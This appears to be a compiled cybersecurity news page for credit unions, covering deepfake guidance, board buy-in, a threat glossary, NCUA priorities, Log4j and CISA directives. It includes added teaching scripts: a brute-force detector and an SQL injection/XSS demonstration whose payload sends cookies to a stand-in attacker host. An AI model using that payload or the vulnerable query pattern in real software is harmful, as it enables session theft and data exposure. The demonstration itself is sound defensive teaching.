The National Security Agency (NSA), the Federal Bureau of Investigation (FBI), and the Cybersecurity and Infrastructure Security Agency (CISA) released a Cybersecurity Information Sheet (CSI), Contextualizing Deepfake Threats to Organizations, which provides an overview of synthetic media threats, techniques, and trends. Threats from synthetic media, such as deepfakes, have exponentially increased—presenting a growing challenge for users of modern technology and communications, including the National Security Systems (NSS), the Department of Defense (DoD), the Defense Industrial Base (DIB), and national critical infrastructure owners and operators. Between 2021 and 2022, U.S. Government agencies collaborated to establish a set of employable best practices to take in preparation and response to the growing threat. Public concern around synthetic media includes disinformation operations, designed to influence the public and spread false information about political, social, military, or economic issues to cause confusion, unrest, and uncertainty.
The authoring agencies urge organizations to review the CSI for recommended steps and best practices to prepare for, identify, defend against, and respond to deepfake threats.
To report suspicious activity or possible incidents involving deepfakes, contact one of the following agencies:
- Cybersecurity Report Feedback: [email protected]
- Internet Crime Complaint Center (IC3) at IC3.gov or contact a local FBI field office
- CISA’s Incident Reporting System or through the agency’s 24/7 Operations Center at [email protected] or (888) 282-0870
August 24, 2022 — With CyberSecurity Awareness month fast approaching, information security professionals and data protection managers will be looking at how to secure board-level buy-in for company-wide cybersecurity awareness campaigns. Often, this is the biggest hurdle for any cyber awareness campaign as senior leadership weighs the costs and benefits of investing in the security of their business.
Today we will be looking at some top tips for changing the tide on board-level buy-in.
What are the obstacles to Board-level buy-in and how to address them?
According to a study by AT&T, board members cite data security as their number one concern; however, 75% of these boards do not actively invest in internal cybersecurity awareness campaigns.
With average data breach costs soaring to $4.4 million in 2022, the need to elevate cybersecurity initiatives on the boardroom agenda is increasing.
Why is there an understanding of the importance of cybersecurity awareness but no impetus to follow up with company-wide campaigns and initiatives?
1. Monetary Hurdles
Cybersecurity awareness providers can use behavior research tools and surveys to properly assess what areas of your company need to be addressed with training and development. This can then help you to present where and what your budget needs to be spent on, thus reassuring board members with facts and actionable insight and analysis. By doing this, you also instantly involve board members in the decision process.
2. Fear of change
One of the biggest hurdles to board buy-in is the fear of change and the comfort of following a tried and tested formula. People don’t like change and breaking leadership habits is very difficult to do.
In order to break this status quo, you need to increase board members involvement in security activities and simulations, especially considering recent developments in cybersecurity regulations.
When you do this, you can show your board members how easy it is to make mistakes and costly errors under the current protocols and teachings. When you root scenarios in relatable and personal examples, the risks associated with a cybersecurity event becomes clear for all board members.
3. Lack of security awareness
There is nothing harder than selling a new and improved security awareness campaign to your board members, especially if they have no security awareness at all. Why would they want to invest a portion of their finances in something that they do not understand? And why should the rest of your workers take security awareness seriously if their managers do not give it a second thought? It is meant to be a team effort after all, isn’t it?
This is a simple fix but requires hands-on work from an organization’s information security officer and/or data protection officer, with the help of your chosen training provider. You need to work to a trickle-down approach. First begin with focus groups and simulated training for board-level members, keeping a focus on the financial and legal ramifications companies face as a result of breaches. Position cybersecurity awareness as a proactive part of your organization with focus on Return on Investment (ROI), whilst highlighting how much more painful it is to be reactive to cybersecurity breaches.
How to engage Board members in the cybersecurity awareness conversation
When you implement a cybersecurity awareness campaign that is supported and planned out by the board, you increase the chances of company-wide buy-in and knowledge retention. So, how will you engage board members in the conversation? By speaking their language.
Sell it to them!
You need to encourage your board to focus on the risks and threat actors that target organizations every single day, but you also need to realize you are selling them something. When you are selling to your board, make concrete the problems their employees face and use board-level language such as risk terminology and KPIs (Key Performance Indicators). Board members want to see stone-cold numbers and measurable data to justify their investment.
Educate them regularly
The biggest reason board members struggle to support cybersecurity awareness initiatives is a lack of knowledge on the issue. If you are in charge of board buy-in, you need to regularly communicate cybersecurity insights, headlines, and stories with your board. They need to understand, in an easy-to-digest way, how cybersecurity is vital to the existence of their organization. Upskilling the board should always be a primary goal in any cybersecurity campaign!
It’s an investment, not a loss!
Board members want to hear things like ‘driving consistency’, ‘streamlining processes’, ‘minimizing human errors’, ‘avoiding reputational damage’, and ‘improving workflow’. Make it clear to your board members that they are making an investment which will lead to increased efficiency in the workforce and savings in the financial sheets. Begin with the message that cybersecurity is not a cost, it is an investment!
Bring in the pros
It is also highly beneficial to bring in the knowledge of a respected and experienced cybersecurity professional/consultant to add evidence to your board presentation. Cybersecurity professionals can run scoping workshops and team activities with your board to answer both company-specific questions and any technical questions that may arise.
In conclusion
Board-level buy-in is key to promoting a secure organization from top to bottom. Remember that your executives are still people, so it is important to communicate your objectives clearly, how your security awareness campaign addresses holes in your security culture and how it keeps your organization safe from cybercrime.
Courtesy of Tripwire Guest Authors
June 7, 2022 — Cyber attacks, hacking, and data breaches are a growing threat. Yet, many companies could have prevented these threats with a bit of risk management and a proactive approach to digital security.
Whether you’re going through a digital transformation or worried about data protection, these are the emerging cyber threats that you need to beware of.
A Forrester report showed that 94% of organizations suffered some type of cyber attack in 2020 alone. Even worse is that three-quarters of those attacks were due to a vulnerability caused by a technology put in place during the pandemic.
Data breaches cost businesses on average $4.24 million in 2021 [*]. And in breaches where remote work was a driving factor, the average cost was $1.07 million higher.
- Malware: a combination of the words malicious and software — is an umbrella term used to refer to software that damages computers, websites, web servers, and networks. While malware isn’t a new threat, hackers are constantly capitalizing on new approaches. This includes ransomware, viruses, spyware, and trojans. Once installed, malware can deny access to your network, secretly obtain sensitive data, and even destroy your system.
- Ransomware: is malware built for extortion. Attackers encrypt (and increasingly first steal) a victim’s data, then demand payment, threatening to publish it or leave it unrecoverable until the ransom is paid. Initial access commonly comes from phishing links or attachments that deliver the malware, though exposed remote-access services and unpatched software are also common entry points.
- Cryptojacking: uses your computer to secretly “mine” cryptocurrencies such as Bitcoin and Ethereum. It rarely destroys data, but it can slow down your devices significantly, drive up power and cloud bills, and it means an attacker already has code running on the machine. Hackers use phishing emails or other methods to get you to click a link that then downloads the cryptojacking malware to your device; browser-based miners can also run from a compromised web page without any download.
- Viruses: are malicious pieces of code that damage your device and can replicate and spread between hosts. Much like flu viruses that can’t replicate without a host, computer viruses can’t spread without a host file or document. Once a virus successfully attaches to a host file or document, it can lay dormant until circumstances “trigger” it to execute its code. Once it does activate, the virus can spread across computers or even across corporate networks.
- Trojans: named after the famed Trojan horse, this type of malware poses as, or is bundled with, legitimate software to get a user to install it, and then opens a backdoor or otherwise exploits the computer or network. Trojans are widely used to steal credentials and credit card information. Users click on a link that hides the Trojan, or download it unknowingly along with legitimate software; once the file is opened, the installer drops the malware onto the device.
- Worms: are self-contained malware that spread on their own, typically by exploiting vulnerabilities or weak credentials on neighboring systems. Unlike viruses, which require a host file, worms are standalone programs that can “wiggle” through your network. Some worms also spread by email: they duplicate themselves and send a copy to every contact in the compromised mailbox. Attackers can use the machines a worm infects to overload servers and launch distributed denial of service (DDoS) attacks.
- Spyware: is a type of malware installed to collect information about users, including their system or browsing habits. There are several different types of spyware to beware of. For example, infostealers harvest saved credentials and data entered into browser forms, while keyloggers record your keystrokes to catch sensitive data. Spyware is distributed in many ways: links, phishing emails, pop-ups, infected ads, or even poisoned links in Google search results. Once a user clicks on the link and the spyware is installed, the data it collects is sent to the attacker. The information is then used for fraud or blackmail, or to install other malicious programs.
- Adware: displays unwanted ads on your computer. It can also change your browser homepage or even add unwanted plugins and other spyware. While adware isn’t quite a virus and isn’t as problematic as other code floating around the internet, you still need to remove it from your computer. Not only is it bothersome, but it could also cause other device issues down the line. Adware can come from either downloading it by mistake or getting it from a malicious website. Once it’s downloaded and installed, adware immediately starts tracking your web activity. One indicator that you’ve been infected is constant pop-up advertisements.
- Drive-By Downloads: are programs that install on your devices without your consent. These include bundled software and unintentional downloads of any files. Drive-by downloads often take advantage of apps, operating systems, software, or web browsers that haven’t been updated, and any compromised or malicious website can serve as the delivery method for the malicious files. Just like other malware, drive-by downloads enter your computer unintentionally. You don’t have to click on or download anything for your computer to be infected: the exploit runs when you visit the infected page.
- IoT Device attacks: Internet of Things (IoT) devices are common targets for bad actors because they have little room to run proper security software, are rarely patched, often ship with default or hard-coded credentials, and frequently store sensitive information like login details and passwords. Hackers exploit this weak security and constant connectedness to gain access to them. Once they install malware, hackers can link devices together into a botnet and launch DDoS attacks, which attempt to knock out networks by flooding them with traffic. IoT devices such as smart speakers can also act as a weak point in your network: once hackers are in, they can pivot to the rest of your systems.
- Wipers — or wiper malware: damage organizations by destroying as much data (if not all) as possible. Unlike ransomware, which has financial motives, wiper attacks are purely disruptive. Criminals may also use wiper attacks to cover the tracks of a separate data theft. Wipers often target files, backups, and the system boot sector or partition table, so the machine cannot even start. Overwriting every byte of every file is time-consuming, so many wipers instead overwrite only the beginning of each file or write blocks of junk data at intervals across the disk, which corrupts files beyond recovery in a fraction of the time.
- Cross-Site Scripting (XSS): hackers get malicious script into a web page that other users view, with the intent of stealing session tokens, cookies, and other information, or acting in the victim’s name. The malicious code is usually JavaScript (historically also Flash or HTML). XSS is possible when a web application places user-supplied input into a page without encoding it, either reflected from a crafted link or stored on the site (for example, in a comment). Because the browser treats the script as part of the legitimate site, it runs with that site’s privileges, including access to the logged-in user’s session. Victims need only view the page, or click on content they think is legitimate, for the attacker’s script to execute.
- Phishing: has been around for years, but is consistently one of the most common ways hackers try to scam you online. It involves sending messages that seem to be from a trusted source to gain personal information or trick you into downloading malware. Phishing attacks can occur via email, text (known as “smishing”), phone calls, fake websites, and social networks. Hackers use a combination of social engineering tactics to gain your trust. Then, they send messages containing malware or a link to a fake site designed to steal your information. COVID-19 scams (like PPP fraud) and phishing schemes have been especially prevalent in the past few years [*].
- Whale and spear phishing: whaling is a phishing attack in which the prime targets are senior executives (aka the “big fish”), while spear phishing is a similar attack that hyper-targets a specific company or individual. In whaling, attackers either target executives directly or impersonate them to pressure staff into handing over sensitive data or payments. In spear phishing, criminals research victims on LinkedIn or other social media sites and pose as a trusted source to gain access to their data.
- Pharming: is when cybercriminals capture user credentials through a fake landing page that the victim reaches without clicking a suspicious link. There are two types of pharming: malware-based and DNS cache poisoning. Malware-based pharming uses a trojan (for example, one that edits the hosts file or the device’s DNS settings) to direct you to a fake site when you type your bank’s address. With DNS cache poisoning, hackers poison the DNS resolver your computer relies on so that the bank’s domain name resolves to the attacker’s server. Either way, even if you enter the correct URL of your banking site, you are redirected to a fake (yet believable) page designed to steal your information, without your knowledge.
- SQL Injection Attacks: An SQL injection attack (SQLi) targets database-driven websites. It happens when an application builds a database query by pasting user input into the query text, so that SQL syntax an attacker types into a vulnerable field, such as a login or contact form, becomes part of the query. Once the injected SQL runs, the attacker can read or change data, bypass logins, erase records, or in some configurations execute commands on the database server. Parameterized queries, which send the input to the database separately from the statement, are the standard fix.
- Denial of Service (DoS): is an attack where attackers overwhelm a system or network with traffic or requests until legitimate users cannot get through. A variation is the distributed denial of service (DDoS) attack: hackers infect computers and devices with malware to turn them into bots, then control the bot network (or botnet) by sending instructions remotely. Some attackers automate this tooling, including with artificial intelligence (AI) technologies. DDoS attacks exhaust server resources or saturate network links, and it can be challenging to separate DDoS traffic from regular traffic.
- Brute Force Attacks: are credential-guessing attacks where hackers use software to repeatedly try passwords (and sometimes usernames) against your login until one works. One in five networks have experienced a brute force attack. Against a login with no lockout or rate limiting, an attacker with a powerful computing engine or control over an extensive botnet can try millions of guesses. Some warning signs that you’re under a brute force attack include:
- The same IP address trying to log in multiple times.
- Many IP addresses try to log into a single account.
- Multiple unsuccessful login attempts being made from different IP addresses in a short period.
- Man-in-the-Middle Attacks (MitM): are a form of eavesdropping where hackers insert themselves into your connection, intercepting data transfers between a client and a server to read data and manipulate traffic. Attackers get into position through a compromised IoT device or router, or by exploiting unsecured public Wi-Fi.
- Insider Threats: are security risks that begin within the targeted organization. It often involves a current or former employee with administrator privileges or access to sensitive information. Insider threats have increased by 47% over the last two years [*], making them an emerging cyber threat. Insider threats occur when someone with authorized access misuses their access. Insider threats can be intentional or unintentional. Unintentional threats occur when a negligent employee falls victim to malware or phishing scams. Most security operations focus on external threats. But the best course of action for limiting insider threats is restricting employee access to systems they need for work.
- Zero-Day Attacks: exploit security vulnerabilities that the vendor or developers have only just discovered, or do not yet know about at all, meaning they have had “zero days” to fix them and no patch is available. Attackers jump to take advantage of the window in which the device or program is vulnerable. Preventing zero-day attacks requires constant monitoring, proactive detection, and prompt patching once a fix ships.
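The XSS and SQL injection entries above share one root cause: untrusted input pasted into text that another system (a browser, a database) will interpret. The following Python script is an added example, not code from the article or from Aura; it runs the same constructed attacker inputs through a string-built SQL lookup and a raw HTML render (the vulnerable pattern), then through a parameterized query and HTML output encoding. The table, user names and payloads are made up for the demonstration.

```python
"""Added example (not from the article): the same untrusted input, first
spliced into SQL text and rendered raw into HTML (the vulnerable pattern),
then bound as a parameter and HTML-encoded.  All data is constructed."""
import html
import sqlite3

# Constructed sample inputs: a "comment" that is really a script, and a
# "username" that closes the SQL string literal and appends a true condition.
XSS_PAYLOAD = "<script>fetch('https://attacker.example/?c='+document.cookie)</script>"
SQLI_PAYLOAD = "' OR '1'='1"


def setup_db() -> sqlite3.Connection:
    """In-memory table standing in for a site's user store (constructed)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("alice", "s3cret-a"), ("bob", "s3cret-b")])
    return con


def lookup_vulnerable(con: sqlite3.Connection, name: str) -> list:
    # Input is spliced into the query text, so SQL syntax inside `name`
    # changes what the query means: WHERE name = '' OR '1'='1' matches all.
    query = f"SELECT name, secret FROM users WHERE name = '{name}'"
    return con.execute(query).fetchall()


def lookup_safe(con: sqlite3.Connection, name: str) -> list:
    # Placeholder binding ships the value separately from the statement;
    # the driver treats it purely as data whatever characters it contains.
    return con.execute("SELECT name, secret FROM users WHERE name = ?", (name,)).fetchall()


def render_vulnerable(comment: str) -> str:
    # Storing or reflecting attacker text straight into the page body is the
    # defect behind XSS: the browser cannot tell this script from the site's.
    return f"<p class='comment'>{comment}</p>"


def render_safe(comment: str) -> str:
    # Encode for the HTML-body context: <, >, &, and quotes become entities,
    # so the browser displays the text instead of executing it.
    return f"<p class='comment'>{html.escape(comment, quote=True)}</p>"


if __name__ == "__main__":
    con = setup_db()
    print(lookup_vulnerable(con, SQLI_PAYLOAD))  # every row: WHERE is always true
    print(lookup_safe(con, SQLI_PAYLOAD))        # [] : nobody is literally named that
    print(render_vulnerable(XSS_PAYLOAD))        # script tag reaches the browser intact
    print(render_safe(XSS_PAYLOAD))              # &lt;script&gt;... rendered as text
```

The encoding in `render_safe` is correct only for text placed in an HTML element body; input that lands in a JavaScript string, a URL, or an attribute needs the encoding for that context, which is why template engines with automatic, context-aware escaping are preferable to hand-escaping.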
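The three brute-force warning signs listed above (one address retrying, many addresses hitting one account, and a burst of failures from different addresses in a short window) can be checked mechanically. The script below is an added example, not part of the article; it parses constructed OpenSSH-style authentication lines and raises one alert per sign. The log format, thresholds (5 failures per IP, 3 source IPs per account, 10 failures in 5 minutes) and the addresses are assumptions chosen for the demonstration, not recommended production values.

```python
"""Added example (not from the article): detect the three brute-force
warning signs over constructed sshd-style log lines.  Format, thresholds
and addresses are assumptions for the demo."""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample log (OpenSSH-like wording; not real traffic).
SAMPLE_LOG = """\
2024-03-01T10:00:01 sshd[101]: Failed password for admin from 203.0.113.5 port 50001
2024-03-01T10:00:02 sshd[101]: Failed password for admin from 203.0.113.5 port 50002
2024-03-01T10:00:03 sshd[101]: Failed password for admin from 203.0.113.5 port 50003
2024-03-01T10:00:04 sshd[101]: Failed password for admin from 203.0.113.5 port 50004
2024-03-01T10:00:05 sshd[101]: Failed password for admin from 203.0.113.5 port 50005
2024-03-01T10:00:06 sshd[101]: Failed password for admin from 203.0.113.5 port 50006
2024-03-01T10:01:00 sshd[102]: Failed password for jdoe from 198.51.100.10 port 40001
2024-03-01T10:01:01 sshd[102]: Failed password for jdoe from 198.51.100.11 port 40002
2024-03-01T10:01:02 sshd[102]: Failed password for jdoe from 198.51.100.12 port 40003
2024-03-01T10:01:03 sshd[102]: Failed password for jdoe from 198.51.100.13 port 40004
2024-03-01T10:01:04 sshd[102]: Failed password for jdoe from 198.51.100.14 port 40005
2024-03-01T10:02:00 sshd[103]: Failed password for alice from 192.0.2.1 port 30001
2024-03-01T10:02:01 sshd[103]: Accepted password for alice from 192.0.2.1 port 30002
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+$"
)


def parse(log: str):
    """Yield (timestamp, result, user, ip) for every line matching LINE_RE."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield (datetime.fromisoformat(m["ts"]), m["result"], m["user"], m["ip"])


def detect(log: str, per_ip: int = 5, per_account_ips: int = 3,
           burst: int = 10, window: timedelta = timedelta(minutes=5)) -> dict:
    """Return alerts keyed by the warning sign they correspond to."""
    failures = sorted(e for e in parse(log) if e[1] == "Failed")
    by_ip = Counter(ip for _, _, _, ip in failures)
    ips_per_user = defaultdict(set)
    for _, _, user, ip in failures:
        ips_per_user[user].add(ip)

    alerts = {"same_ip_repeated": [], "many_ips_one_account": [], "burst": []}
    # 1. the same source address failing again and again
    alerts["same_ip_repeated"] = sorted(ip for ip, n in by_ip.items() if n >= per_ip)
    # 2. one account attacked from many sources (distributed guessing)
    alerts["many_ips_one_account"] = sorted(
        u for u, ips in ips_per_user.items() if len(ips) >= per_account_ips)
    # 3. many failures from distinct addresses inside a short sliding window
    for i, (t0, *_) in enumerate(failures):
        in_window = [e for e in failures[i:] if e[0] - t0 <= window]
        if len(in_window) >= burst and len({e[3] for e in in_window}) > 1:
            alerts["burst"].append(t0.isoformat())
            break  # one alert for the first qualifying window is enough
    return alerts


if __name__ == "__main__":
    for sign, hits in detect(SAMPLE_LOG).items():
        print(f"{sign}: {hits}")
```

A single counter per address is what a tool like fail2ban keys on; the second and third checks matter because a botnet spreads its guesses across many addresses specifically to stay under that per-address threshold.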
Read more about these threats with real-life examples here.
Courtesy of Christopher Bray, Aura
(Jan. 21, 2022) Credit risk management, cybersecurity and payment systems are the three top supervisory priorities for NCUA, the agency said this week.
Additionally, the agency indicated it will also be taking a closer look at overdraft programs at credit unions, with an eye to perhaps further action in 2023.
Overall, NCUA said in its letter to credit unions (22-CU-02), it will continue to conduct examination and supervision activities primarily offsite, given the uncertainty associated with the coronavirus crisis.
“Working with our public health consultant, the agency continues to closely monitor the COVID-19 pandemic trends and will resume onsite examination and supervision work when safe to do so,” the letter stated.
On its apparent top priority of credit risk management, the agency said its examiners would continue to review management and mitigation efforts at credit unions. “For all lending programs, credit unions’ risk management practices should be commensurate with the level of complexity and nature of their lending activities,” the agency letter states. “Credit unions must maintain safe-and-sound lending practices and comply with consumer financial protection laws, including disclosures and regulatory reporting requirements.”
Examiners will focus on adjustments credit unions made to lending programs to address borrowers facing financial hardship, the letter states. Examiners will also emphasize reviewing policies that address the use of loan workout strategies, risk-management practices, and “new strategies implemented to provide funds to borrowers under distress, including programs authorized under the CARES Act and extended in the Consolidated Appropriations Act, 2021,” the letter states. Examiners will evaluate credit unions’ controls, reporting, and tracking of these programs, in particular, NCUA wrote.
“NCUA examiners will not criticize a credit union’s efforts to provide prudent relief for borrowers when such efforts are conducted in a reasonable manner with proper controls and management oversight,” the letter stated.
On cybersecurity, the agency said it is developing updated information security examination procedures tailored to institutions of varying size and complexity. The procedures will be piloted and finalized this year, NCUA said. “Cybersecurity risks remain a significant threat to the financial system,” the letter stated. “Ransomware, third-party/supply chain risks, and business email compromises, in particular, continue to be of concern.”
The agency asserted that payment systems are growing in complexity and risk for credit unions and consumers, pledging increased focus in the area. “Today’s environment of easy and fast electronic processing of transactions relies on technology, the applications and their controls, and the underlying security of the platforms facilitating the transactions,” NCUA wrote. “The changes in payment systems increase the risk of fraud, illicit use, and breaches of data security.”
Key points of the other priorities include:
- Overdraft programs (consumer financial protection): Examiners will request information about a credit union’s policies and procedures governing its overdraft programs and the monitoring tools and audit of its overdraft programs, as well as the communications it provides to consumers about such programs. “We anticipate using this documentation for a fuller review of credit unions’ overdraft programs in 2023,” NCUA wrote.
- Loan-loss reserving: The agency reminded that credit unions subject to generally accepted accounting principles (GAAP) are required to implement the current expected credit losses (CECL) accounting methodology by the start of next year. (Credit unions under $10 million are not required to follow GAAP.) All federal credit unions, the agency noted, will be required to have a reasonable reserve methodology, provided the methodology adequately covers known and probable loan losses. Federally insured, state-chartered credit unions (FISCUs) should refer to state law on GAAP accounting requirements and CECL standard applicability, the agency wrote.
- Loan participations: Examiners will verify that credit unions have evaluated the risk in the loan participation transactions and how that risk fits within the tolerance levels established by the credit union’s board. At a transactional level, NCUA said, each loan participation must have separate and distinct records for individual payments, including principal, interest, fees, escrows, and other information relating to individual loans.
- LIBOR transition: Examiners will focus on credit unions with significant LIBOR exposure or inadequate fallback language.
LINK:
NCUA Letter to Credit Unions 22-CU-02: NCUA’s 2022 Supervisory Priorities
(Dec. 23, 2021) The revelation of the “log4j” computer vulnerability made headlines this week, and NASCUS followed up by posting on its cybersecurity alerts and responses web pages guidance from federal agencies on how to protect against exploitations of the weakness.
Late last week, the federal Cybersecurity & Infrastructure Security Agency (CISA) released a directive ordering federal civilian executive branch agencies to address vulnerabilities in Log4j, a logging library widely used in Java software, including on websites and in applications. The library holds a “critical remote code execution” (RCE) vulnerability that computer and network security officials have found is being exploited by hackers. CISA described the hacks as “active, widespread exploitation.”
Friday’s directive, according to CISA, requires agencies to implement additional mitigation measures for vulnerable products where patches are not currently available and requires agencies to patch vulnerable internet-facing assets immediately.
By the beginning of this week, news about the vulnerability was reported widely in the press, with some headlines stating the vulnerability could be the “most serious in decades.”
Federal civilian agencies have until Friday to complete patching for log4j, according to press reports.
But that may not be enough, according to cybersecurity experts, as by then hackers may have already found their way into systems using the code.
In the meantime, users are advised to be on the lookout for phishing emails (and many of them) – and NOT to click on any links. For example, in response to an email claiming that an account has been compromised or a package failed to deliver, a user should ensure first that an account actually exists with that company and the user was expecting an email. Then, the user should find a real customer service number or address online and reach out in either (or both) of those methods.
Additionally, updating systems and apps with the patches provided by software developers is the best defense, according to security practitioners.
LINK:
NASCUS Cybersecurity Alerts & Resources: Apache Log4j Vulnerability Guidance
(Dec. 17, 2021) Self-testing of credit unions’ cybersecurity preparedness through an application released in October costs nothing and can be downloaded via NCUA’s website, the agency said in a letter this week to federally insured credit unions.
The Automated Cybersecurity Evaluation Toolbox (ACET) was created to help credit unions conduct a maturity assessment that aligns with the Federal Financial Institutions Examination Council’s (FFIEC) Cybersecurity Assessment Tool, NCUA said in letter 21-CU-15, signed by agency board Chairman Todd Harper. It said the toolbox can be used by institutions of all sizes and complexity to determine and measure their information and cybersecurity preparedness against several industry standards and best practices.
The agency said the assessment incorporates cybersecurity standards and practices established for financial institutions: It includes practices found in the FFIEC IT Examination Handbooks, regulatory guidance, and leading industry standards like the National Institute of Standards and Technology (NIST) Cybersecurity Framework.
“While we highly encourage the use and implementation of the maturity assessment for a credit union to determine its information and cybersecurity preparedness level, it is only a self-assessment,” according to the letter. “Credit unions are not required to use the Toolbox or complete the maturity assessment. However, it can provide insight into additional steps a credit union may consider taking to strengthen its overall security posture.”
(Nov. 24, 2021) A final rule requiring banks to notify their federal regulators of certain cyber incidents with potentially systemic effects was approved jointly late last week; it takes effect April 1, with compliance required by May 1. NCUA has not yet adopted a similar rule for credit unions.
Adopted by the Federal Reserve, FDIC, and OCC, the final rule requires a banking organization to notify its primary federal regulator of any “computer-security incident” that rises to the level of a “notification incident” as soon as possible and no later than 36 hours after the banking organization determines that a cyber incident has occurred, according to a notice for the Federal Register.
The final rule defines a “notification incident” as a computer-security incident that has materially disrupted or degraded, or is reasonably likely to materially disrupt or degrade, a banking organization’s:
- ability to carry out banking operations, activities, or processes, or deliver banking products and services to a material portion of its customer base, in the ordinary course of business;
- business line (or lines), including associated operations, services, functions, and support, that upon failure would result in a material loss of revenue, profit, or franchise value; or
- operations, including associated services, functions and support, as applicable, the failure or discontinuance of which would pose a threat to the financial stability of the United States.
The final rule also requires a bank service provider to notify each affected banking organization customer as soon as possible when the bank service provider determines that it has experienced a computer-security incident that has caused, or is reasonably likely to cause, a material service disruption or degradation for four or more hours, the notice states.
LINK:
Agencies approve final rule requiring computer-security incident notification
(Nov. 19, 2021) Monetary policy, inflation, and cyberattacks could heighten risk to the financial system, according to the annual report issued this week by the Treasury office tasked with conducting financial research.
The report also raised concerns about risks related to low bank profitability, commercial real estate performance and hedge fund strategies.
According to the Office of Financial Research (OFR) annual report to Congress, the economy has rebounded and volatility caused by the pandemic has subsided. However, the other challenges to the financial system mean the overall risks to the financial system remain in the medium range.
According to the OFR press release, the report, highlights three key research findings related to financial system vulnerabilities:
- Macroeconomic uncertainty remains about the continuing impact of the coronavirus and the “pattern of inflation.”
- Cyber risk has grown from mounting economic costs inflicted by cyberattacks and the increasing expense required to guard against them.
- The potential risk from climate change – which has introduced vulnerabilities – is still difficult to identify, assess and forecast for the financial system.
About “sector-specific” risk, the report notes that risks tied to low rates on banks’ profits should be closely monitored. “Higher interest rates on longer-term investments, such as 10-year Treasuries, did not increase net interest margins,” OFR said. “While further research is necessary, possible explanations include lower loan demand and less willingness on the part of banks to lend at longer maturities or take on more deposits.”
(Nov. 5, 2021) Addressing and mitigating actively exploited vulnerabilities on all federal agency computer networks is the aim of a directive issued this week by the federal agency that oversees cybersecurity, which the agency said is a first-ever federal government-wide requirement.
In issuing the order, the Cybersecurity and Infrastructure Security Agency (CISA) said it also encourages state and local governments, as well as the private sector, to also take action.
The “Binding Operational Directive” (BOD 22-01), CISA said, is sending a “clear message to all organizations across the country to focus patching on the subset of vulnerabilities that are causing harm now, and enable CISA to drive continuous prioritization of vulnerabilities based on our understanding of adversary activity.”
The order, the agency said, applies to all software and hardware found on federal information systems, including those managed on agency premises or hosted by third parties on an agency’s behalf. According to agency Director Jen Easterly, the order lays out clear requirements for federal civilian agencies to take immediate action to improve their vulnerability management practices and dramatically reduce their exposure to cyber attacks.
“While this Directive applies to federal civilian agencies, we know that organizations across the country, including critical infrastructure entities, are targeted using these same vulnerabilities,” she said. “It is therefore critical that every organization adopt this Directive and prioritize mitigation of vulnerabilities listed in CISA’s public catalog.”
The agency noted that the order prioritizes resources for patching vulnerabilities that are most likely to result in a damaging intrusion into federal agencies and American businesses, “building upon existing methods widely used to prioritize vulnerabilities by many organizations today.”
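As an added illustration of the prioritization the directive describes (this is example code, not CISA's or NCUA's), the function below ranks scanner findings so that vulnerabilities listed in a known-exploited catalog come first, ordered by remediation due date, with everything else falling back to severity score. The catalog and scan records are constructed sample data with placeholder CVE identifiers; the record field names are modeled on the public KEV catalog's JSON and are an assumption here.

```python
"""Rank scan findings: catalog-listed (known exploited) first, then by CVSS."""
from datetime import date

# Constructed sample shaped like known-exploited-vulnerabilities catalog records.
# CVE IDs are placeholders, not real identifiers.
KEV_CATALOG = [
    {"cveID": "CVE-0000-0001", "product": "ExampleVPN",
     "dateAdded": "2021-11-03", "dueDate": "2021-11-17"},
    {"cveID": "CVE-0000-0002", "product": "ExampleMail",
     "dateAdded": "2021-11-03", "dueDate": "2022-05-03"},
]

# Constructed scanner output for a handful of assets.
SCAN_FINDINGS = [
    {"cve": "CVE-0000-0003", "asset": "web-01", "cvss": 9.8},
    {"cve": "CVE-0000-0001", "asset": "vpn-01", "cvss": 7.2},
    {"cve": "CVE-0000-0002", "asset": "mail-01", "cvss": 5.3},
    {"cve": "CVE-0000-0004", "asset": "db-01", "cvss": 4.0},
]


def prioritize(findings, catalog, today):
    """Return findings sorted for remediation.

    Catalog-listed CVEs sort before all others (soonest or most overdue
    due date first); unlisted CVEs are ordered by CVSS, highest first.
    Each result carries 'kev', 'due' and 'overdue' fields for reporting.
    """
    listed = {entry["cveID"]: entry for entry in catalog}
    ranked = []
    for finding in findings:
        entry = listed.get(finding["cve"])
        if entry is not None:
            due = date.fromisoformat(entry["dueDate"])
            days_left = (due - today).days
            key = (0, days_left, -finding["cvss"])
            ranked.append({**finding, "kev": True, "due": due.isoformat(),
                           "overdue": days_left < 0, "_key": key})
        else:
            key = (1, 0, -finding["cvss"])
            ranked.append({**finding, "kev": False, "due": None,
                           "overdue": False, "_key": key})
    ranked.sort(key=lambda row: row["_key"])
    for row in ranked:
        del row["_key"]
    return ranked


if __name__ == "__main__":
    for row in prioritize(SCAN_FINDINGS, KEV_CATALOG, date(2021, 11, 20)):
        print(row)
```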
LINK:
CISA Releases Directive on Reducing The Significant Risk Of Known Exploited Vulnerabilities
(Oct. 22, 2021) Speaking of cybersecurity: cloud-based email services are proving to be targets for cybercriminals, and credit unions need to take preventative steps to thwart exploitation, NCUA said this week.
In Risk Alert 21-RISK-01, the agency said phishing emails designed to steal account credentials for cloud-based email services have proven to be among the most effective types of business email compromise (BEC) scams. The agency said cybercriminals use phishing kits to target victims on cloud-based services, analyze the compromised accounts, impersonate email communications, fraudulently demand (and receive) payments, compromise address books, send more phishing emails — and more.
The risk alert listed 12 steps credit unions may take to prevent BEC fraud; the top three are: enable multi-factor authentication for all email accounts; disable basic or legacy account authentication that does not support multi-factor authentication; use caution when posting information on social media and company websites, especially job duties and descriptions, hierarchical information, and out-of-office details.
The risk alert also notes that wire transfer fraud incidents are increasing as more transactions move to virtual environments. The alert lists a number of operational, transactional, and physical and logical controls for limiting wire fraud risk and incidents.
(Oct. 22, 2021) Ransomware risks and threats to credit unions and other financial institutions are rising considerably, the NCUA Board was told Thursday; the method now accounts for 10% of all cyber breaches.
The threat, NCUA Critical Infrastructure Division Director Ernie Chambers told the board, is enabled by cryptocurrency and has been cited as “among the largest of cybersecurity threats” today to financial institutions.
The cybersecurity presentation was made to the board partly in advance of the updated Automated Cybersecurity Evaluation Toolbox (ACET), which the agency will introduce in a webinar set for next week (Oct. 28).
Chambers also cited phishing and supply chain attacks as key threats to the credit union system; he urged institutions to take steps to address each.
